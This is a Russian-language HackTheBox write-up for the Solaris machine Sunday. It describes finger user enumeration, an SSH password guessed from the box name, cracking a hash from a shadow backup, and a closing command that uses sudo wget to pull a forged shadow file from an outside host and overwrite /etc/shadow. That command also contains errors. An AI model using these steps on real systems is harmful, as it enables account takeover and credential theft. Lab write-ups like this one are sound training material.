CTF. Writeup Sunday. HackTheBox.
@webware
Hello World!
Writeup на машину Sunday, сегодня уходит на пенсию.
ОС Solaris. Сложность Easy. Вредность зашкаливает.
Очень и легкая и очень плохая машина. Легкая потому что интуитивно понятно куда идти и что делать, плохая потому что сотни людей повышают привилегии через файл sudoers и ломают sudo в следствии чего сброс машины каждые 10 минут.
Сканирование:
Видим открытый 79 порт Finger, с помошью него можно узнать пользователей залогиненых в системе. Заюзаем nmap скрипт
Получаем 2-х юзеров sammy и sunny, к слову сказать скрипт нмапа не единственный способ узнать юзеров, есть модуль в метасплоите для перечесления пользователей auxiliary/scanner/finger/finger_users и скрипт на перле finger-user-enum , это то что я юзал.
Из других портов не удалось ничего вытащить что позволило бы получить оболочку на машине, и можно было бы начать брут ssh, но перед этим стоило попробовать пароли “ленивого админа”))) шутка)), но с долей правды)
Зачастую на хтб название коробки, что-то да значит, так есть и в этот раз) Слово Sunday подошло как пароль ssh к пользователю sunny
Подключившись и погуляв по директориям находим папку backup, содержащую 2 файла, один из которых shadow.backup, он то нам и интересен. Скинем себе.
Еще погуляв под пользователем sunny выход на рута найден не был, в файле shadow есть хеш второго юзера, брутим его.
На брут понадобилось менее 10 минут. Узнав пароль 2-ого пользователя можно подключится и забрать флаг юзера.
Теперь root. Корневой флаг оказался просто “вери изи”.
Смотрим sudo -l и видим нопасворд от рута на запуск утилиты wget. Тут масса вариантов. Я выбрал самый легкий, просто прочитать файл root.txt.
Удача, файл с флагом оказался там где должен быть. Но вдруг он находился бы в другой директории и прочитать его не судьба вот так просто.
Шел от рута можно получить добавив в файл shadow.backup строчку root и хеш одного из пользователей
после чего закинуть его wget-ом заменив оригинал.
sudo wget http;//XXX.XXX.XXX.XXX/shadow -o /etc/shadow
и перелогинится в рут.
